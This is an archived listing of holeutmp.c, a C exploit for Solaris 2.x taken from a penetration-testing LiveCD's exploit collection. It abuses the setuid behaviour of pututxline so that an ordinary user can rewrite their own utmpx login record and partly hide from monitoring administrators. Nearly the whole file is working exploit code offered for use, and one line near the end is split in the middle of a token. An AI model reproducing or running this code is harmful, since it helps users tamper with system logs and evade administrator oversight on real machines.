home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / holeutmp.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  121 lines

---

1. /*
2.  * utmprm (version 1.0)
3.  * renamed to holeutmp.c (version 1.0)
4.  *
5.  * Copyright, 1994, 1995 by Scott Chasin (chasin@crimelab.com)
6.  * Modified by Hendrik Visage (hendrik@jupiter.cs.up.ac.za)
7.  * to exploit a pututxline SETGID problem
8.  *
9.  * This material is copyrighted by Scott Chasin, 1994, 1995. The
10.  * usual standard disclaimer applies, especially the fact that the
11.  * author is not liable for any damages caused by direct or indirect
12.  * use of the information or functionality provided by this program.
13.  */
14.  
15. /* utmprm takes advantage of a Solaris 2.x utmpx system call that
16.  * allows any user to remove themselves from the corresponding
17.  * utmp files and partly out of the eyes of monitoring admins.
18.  */
19.  
20. #include <stdio.h>
21. #include <pwd.h>
22.  
23. #include <utmpx.h>
24.  
25. char *strchr(), *strdup(), *ttyname(), *getlogin();
26.  
27. main (argc, argv)
28. int argc;
29. char **argv;
30. {
31.   uid_t ruid, getuid();
32.   char *ttyn, *tty, *username;
33.   struct passwd *pwd;
34.  
35.   /* Grab our ttyname */
36.  
37.   ttyn = ttyname(0);
38.  
39.   if (ttyn == NULL || *ttyn == '\0')
40.     {
41.       fprintf (stderr, "utmprm: where are you?\n");
42.       exit (1);
43.     }
44.  
45.   if (tty = strchr (ttyn + 1, '/'))
46.     ++tty;
47.   else
48.     tty = ttyn;
49.  
50.   /* Grab our login name */
51.   ruid = getuid ();
52.   username = getlogin ();
53.  
54.   if (username == NULL || (pwd = getpwnam (username)) == NULL ||
55.       pwd->pw_uid != ruid)
56.     pwd = getpwuid (ruid);
57.  
58.   if (pwd == NULL)
59.     {
60.       fprintf (stderr, "utmprm: who are you?\n");
61.       exit (1);
62.     }
63.  
64.   username = strdup (pwd->pw_name);
65.  
66.   utmpx_delete (username, tty);
67. }
68.  
69. utmpx_delete (user, line)
70. char *user;
71. char *line;
72. {
73.   struct utmpx utx;
74.   struct utmpx *ut;
75.  
76.   /* Let's build a utmpx structure that looks like
77.    * our entries profile.
78.    */
79.  
80.   strncpy (utx.ut_line, line, sizeof (utx.ut_line));
81.   strncpy (utx.ut_user, user, sizeof (utx.ut_user));
82.  
83.   /* We use getutxline to search /var/adm/utmpx for our
84.    * entry.
85.    */
86.  
87.   if ((ut = getutxline (&utx)) == 0)
88.     printf ("utmprm: entry not found for %s (%s)\n", user, line);
89.   else
90.     {
91.       /* Since we doesn't want to remove the entry,
92.          all the DEAD_PROCESS related stuff
93.          isn't needed
94.       ut->ut_type = DEAD_PROCESS;
95.       ut->ut_exit.e_termination = 0;
96.       ut->ut_exit.e_exit = 0;
97. [2000]*/
98.  
99.       gettimeofday (&(ut->ut_tv), 0);
100.       ut->ut_type = USER_PROCESS;
101.       strcpy(&(ut->ut_host),"Probleme.SA");
102.       ut->ut_syslen=strlen(ut->ut_host);
103.  
104.       strcpy(&(ut->ut_line),"|");
105.  
106.       /* Using pututxline as a normal user, we take advantage
107.        * of the fact that it calls a setuid system call to
108.        * modify the utmpx entry we just build.  The only check
109.        * that pututxline has is that the login name in the utmpx
110.        * entry must match that of the caller's and that the
111.        * utmpx device entry is a real device writable by the
112.        * caller.
113.  [2000]*/
114.  
115.       pututxline (ut);
116.       printf ("utmprm: %s (%s) modified with exit code %d.\n", user, line,put
117.               utxline (ut));
118.     }
119.   endutxent ();
120. }
121. /*                    www.hack.co.za              [2000]*/